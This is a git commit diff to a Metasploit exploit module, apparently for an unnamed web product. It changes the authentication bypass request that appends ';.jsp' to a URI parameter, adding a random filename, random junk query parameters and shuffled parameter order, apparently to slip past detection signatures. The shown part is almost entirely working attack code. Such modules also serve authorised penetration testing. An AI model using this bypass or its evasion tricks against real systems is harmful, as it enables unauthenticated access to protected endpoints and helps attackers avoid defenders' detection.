we can shuffle thequery params so teh jsp param is not first. we can optionally add soem charachters before the trailing .jsp
This commit is contained in:
parent
b7200b52e1
commit
f0ca5c10dc
|
@ -93,10 +93,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# This is the authentication bypass vulnerability, allowing any authenticated endpoint to be access unauthenticated.
|
||||
def send_auth_bypass_request_cgi(opts = {})
|
||||
opts['vars_get'] = {
|
||||
'jsp' => "#{opts['uri']};.jsp"
|
||||
# The file name of the .jsp can be 0 or more characters (it just has to end in .jsp)
|
||||
vars_get = {
|
||||
'jsp' => "#{opts['uri']};#{Rex::Text.rand_text_alphanumeric(rand(8))}.jsp"
|
||||
}
|
||||
|
||||
# Add in 0 or more random query parameters, and ensure the order is shuffled in the request.
|
||||
0.upto(rand(8)) do
|
||||
vars_get[Rex::Text.rand_text_alphanumeric(rand(1..8))] = Rex::Text.rand_text_alphanumeric(rand(1..16))
|
||||
end
|
||||
|
||||
opts['vars_get'] = {} unless opts.key? 'vars_get'
|
||||
|
||||
opts['vars_get'].merge!(vars_get)
|
||||
|
||||
opts['shuffle_get_params'] = true
|
||||
|
||||
opts['uri'] = normalize_uri(target_uri.path, Rex::Text.rand_text_alphanumeric(8))
|
||||
|
||||
send_request_cgi(opts)
|
||||
|
|
Loading…
Reference in New Issue